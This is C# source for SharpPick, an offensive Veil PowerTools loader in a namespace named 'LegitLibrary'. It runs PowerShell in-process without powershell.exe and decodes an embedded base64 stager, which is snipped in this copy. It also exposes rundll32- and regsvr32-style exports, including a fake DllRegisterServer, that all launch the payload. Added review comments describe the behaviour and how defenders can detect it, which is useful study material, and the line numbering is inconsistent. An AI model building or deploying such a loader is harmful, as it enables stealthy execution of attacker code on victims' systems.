  1. /*
  2. * SharpPick aka InexorablePoSH
  3. * Description: Application to load and run powershell code via the .NET assemblies
  4. * License: 3-Clause BSD License. See Veil PowerTools Project
  5. *
  6. * This application is part of Veil PowerTools, a collection of offensive PowerShell
  7. * capabilities. Hope they help!
  8. *
  9. * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
  10. */
  11.  
  12. using System;
  13. using System.IO;
  14. using System.Resources;
  15. using System.Collections.Generic;
  16. using System.Linq;
  17. using System.Text;
  18. using System.Net;
  19.  
  20. //Adding libraries for powershell stuff
  21. using System.Collections.ObjectModel;
  22. using System.Management.Automation;
  23. using System.Management.Automation.Runspaces;
  24.  
  25. using System.Diagnostics;
  26. using System.Reflection;
  27. using System.Runtime.InteropServices;
  28. using RGiesecke.DllExport;
  29.  
  30.  
  31.  
  32. namespace LegitLibrary
  33. {
  /// <summary>
  /// Hosts the PowerShell engine in-process (System.Management.Automation) and runs a
  /// caller-supplied string as a script, returning the pipeline's text output.
  /// No powershell.exe is started; the engine assembly is loaded into this process.
  /// </summary>
  public class Program
  {
    /// <summary>
    /// Runs <paramref name="cmd"/> as PowerShell script text in a fresh runspace and
    /// returns the <c>Out-String</c> rendering of every result object, trimmed.
    /// </summary>
    /// <param name="cmd">Script text. It is handed to <c>AddScript</c> verbatim, so whatever
    /// the caller passes is executed as code; nothing here validates it.</param>
    /// <returns>The concatenated, trimmed text output of the pipeline; an empty string when
    /// the pipeline produced no objects.</returns>
    /// <remarks>
    /// NOTE(review): <c>runspace.Close()</c> is not in a <c>finally</c> block and neither the
    /// <see cref="Runspace"/> nor the <see cref="Pipeline"/> is disposed; if <c>Invoke</c>
    /// throws, the runspace is left open. <c>scriptInvoker</c> is created, never used and
    /// never disposed.
    /// NOTE(review): because the engine runs in-process, engine-side controls (script block /
    /// module logging, AMSI where the loaded engine version supports it) apply to this host
    /// too — confirm against the engine version actually loaded. For defenders, the observable
    /// is a non-PowerShell process loading System.Management.Automation.dll.
    /// </remarks>
    public static string RunPS(string cmd)
    {
      //Init stuff: a new, isolated runspace for this call
      Runspace runspace = RunspaceFactory.CreateRunspace();
      runspace.Open();
      RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace); // unused; see remarks
      Pipeline pipeline = runspace.CreatePipeline();

      //Add commands: the whole string is executed as script, not as a single cmdlet
      pipeline.Commands.AddScript(cmd);

      //Prep PS for string output and invoke: Out-String renders the result objects as text
      pipeline.Commands.Add("Out-String");
      Collection<PSObject> results = pipeline.Invoke();
      runspace.Close();

      //Convert records to strings (Append(object) uses each PSObject's ToString())
      StringBuilder stringBuilder = new StringBuilder();
      foreach (PSObject obj in results)
      {
        stringBuilder.Append(obj);
      }
      return stringBuilder.ToString().Trim();
    }
  }
  61.  
  /// <summary>
  /// Carries the embedded payload: a base64-encoded PowerShell script that is decoded and
  /// handed to <see cref="Program.RunPS"/>. The commented-out <c>Main</c> signature below
  /// shows this was once a console entry point; here it is reached from the DLL exports instead.
  /// </summary>
  public class Service
  {
    /// <summary>
    /// Decodes the hard-coded <c>stager</c> literal (base64 of UTF-16LE text) and executes
    /// it as PowerShell in-process. The output is discarded.
    /// </summary>
    /// <remarks>
    /// NOTE(review): the literal as pasted ends in <c>...[SNIP]</c>, which is not valid base64,
    /// so <c>Convert.FromBase64String</c> would throw <see cref="FormatException"/> on this copy;
    /// the real payload was removed from the paste and its contents are not on this page.
    /// NOTE(review): the indicator here is an encoded script literal decoded at runtime; the
    /// decoded text exists only in memory — nothing in this block writes it to disk.
    /// </remarks>
    public static void Exec()
    //static int Main(string[] args)
    {
      string stager = "WwBSAEUARgBdAC4AQQBTAFM...[SNIP]";
      // Encoding.Unicode is UTF-16LE: the literal is base64 over UTF-16LE script text
      var decodedScript = Encoding.Unicode.GetString(Convert.FromBase64String(stager));

      //We should now have the script variable filled... double check before executing
      string results = Program.RunPS(decodedScript); // return value is never read
    }
  }
  74.  
  /// <summary>
  /// Unmanaged exports (via RGiesecke.DllExport) so the managed DLL can be invoked by native
  /// loaders. <c>EntryPoint</c> has the <c>(HWND, HINSTANCE, LPSTR, int)</c> shape that
  /// rundll32.exe passes to an exported function; <c>DllRegisterServer</c> /
  /// <c>DllUnregisterServer</c> are the COM self-registration exports regsvr32.exe calls.
  /// All three paths run the same payload.
  /// </summary>
  /// <remarks>
  /// NOTE(review): for detection, the tell is that a "registration" DLL executes identical
  /// code on register, unregister and plain entry, and that whichever process loaded this DLL
  /// then loads System.Management.Automation.dll. The exports do nothing COM-related and are
  /// declared <c>void</c>, whereas genuine DllRegisterServer/DllUnregisterServer return an HRESULT.
  /// </remarks>
  class Exports
  {
    // rundll32-style signature: hwnd, hinst, lpszCmdLine, nCmdShow. lpszCmdLine is ignored.
    [DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
    public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
    {
      Service.Exec();
    }
    // COM registration export; runs the payload instead of registering anything.
    [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
    public static void DllRegisterServer()
    {
      Service.Exec();
    }
    // COM unregistration export; same payload — "unregistering" also executes it.
    [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
    public static void DllUnregisterServer()
    {
      Service.Exec();
    }
  }
  93. }